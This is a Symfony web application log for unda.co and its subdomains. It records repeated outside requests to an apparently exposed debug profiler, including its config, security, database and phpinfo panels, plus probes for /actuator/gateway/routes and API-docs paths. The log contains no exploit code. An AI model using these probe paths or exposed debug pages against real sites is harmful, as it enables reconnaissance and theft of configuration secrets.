[2025-12-19 10:07:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 10:12:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3?panel=request","method":"GET"} []
[2025-12-19 10:12:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 10:13:48] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 10:15:02] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-19 10:15:02] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 10:15:02] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 10:15:02] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 10:15:02] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 10:15:02] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 10:15:02] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 10:20:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3?panel=config","method":"GET"} []
[2025-12-19 10:20:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 10:24:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 10:24:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 10:26:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c56c4f","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c56c4f","method":"GET"} []
[2025-12-19 10:26:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 10:28:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3?panel=cache","method":"GET"} []
[2025-12-19 10:28:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 10:31:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32464c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32464c?panel=logger","method":"GET"} []
[2025-12-19 10:31:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-19 10:32:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"50c9dd","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/50c9dd","method":"GET"} []
[2025-12-19 10:32:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 10:35:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618?panel=twig","method":"GET"} []
[2025-12-19 10:35:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 10:35:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3","method":"GET"} []
[2025-12-19 10:35:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 10:38:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"565723","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/565723?panel=swiftmailer","method":"GET"} []
[2025-12-19 10:38:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-19 10:39:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e1073a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e1073a?panel=config","method":"GET"} []
[2025-12-19 10:39:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 10:41:18] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 10:43:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19?panel=security","method":"GET"} []
[2025-12-19 10:43:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 10:51:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19?panel=request","method":"GET"} []
[2025-12-19 10:51:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 10:59:15] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 10:59:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19?panel=config","method":"GET"} []
[2025-12-19 10:59:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 11:06:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19?panel=cache","method":"GET"} []
[2025-12-19 11:06:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 11:08:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618?panel=request","method":"GET"} []
[2025-12-19 11:08:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 11:13:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a9cd19","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a9cd19","method":"GET"} []
[2025-12-19 11:13:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 11:13:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/gateway/routes"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/gateway/routes\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 11:15:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 11:16:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89abd5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/89abd5?panel=events","method":"GET"} []
[2025-12-19 11:16:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-19 11:19:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 11:22:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0?panel=twig","method":"GET"} []
[2025-12-19 11:22:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 11:32:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0?panel=time","method":"GET"} []
[2025-12-19 11:32:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 11:39:16] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 11:40:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"07a9c5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/07a9c5?panel=cache","method":"GET"} []
[2025-12-19 11:40:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 11:40:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0?panel=security","method":"GET"} []
[2025-12-19 11:40:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 11:48:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0?panel=request","method":"GET"} []
[2025-12-19 11:48:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 11:54:29] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 11:54:33] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 11:56:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0?panel=config","method":"GET"} []
[2025-12-19 11:56:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 11:58:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"04e5af","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/04e5af","method":"GET"} []
[2025-12-19 11:58:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 11:59:19] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 11:59:20] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 12:05:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0?panel=cache","method":"GET"} []
[2025-12-19 12:05:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 12:06:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"aa0429","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/aa0429?panel=request","method":"GET"} []
[2025-12-19 12:06:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 12:12:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465dd0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/465dd0","method":"GET"} []
[2025-12-19 12:12:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 12:17:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a8e8fa","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/a8e8fa?panel=time","method":"GET"} []
[2025-12-19 12:17:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 12:17:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"479de6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/479de6?panel=db","method":"GET"} []
[2025-12-19 12:17:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-19 12:18:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=validator","method":"GET"} []
[2025-12-19 12:18:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-19 12:20:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7?panel=twig","method":"GET"} []
[2025-12-19 12:20:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 12:20:33] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 12:21:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 12:26:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 12:27:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7?panel=time","method":"GET"} []
[2025-12-19 12:27:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 12:27:43] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 12:30:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"879f21","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/879f21","method":"GET"} []
[2025-12-19 12:30:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 12:32:14] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-19 12:34:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7?panel=security","method":"GET"} []
[2025-12-19 12:34:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 12:40:00] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://35.175.10.94/_profiler/phpinfo","method":"GET"} []
[2025-12-19 12:42:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7?panel=request","method":"GET"} []
[2025-12-19 12:42:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 12:47:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=189.172.26.39&limit=10&method=GET","method":"GET"} []
[2025-12-19 12:47:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.26.39&limit=10&method=GET","method":"GET"} []
[2025-12-19 12:50:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7?panel=config","method":"GET"} []
[2025-12-19 12:50:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-19 12:51:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b144c2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b144c2?panel=exception","method":"GET"} []
[2025-12-19 12:51:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-19 12:54:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 12:54:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-19 12:57:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7?panel=cache","method":"GET"} []
[2025-12-19 12:57:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 12:57:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44","method":"GET"} []
[2025-12-19 12:57:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 13:04:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5bace7","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5bace7","method":"GET"} []
[2025-12-19 13:04:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 13:12:48] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
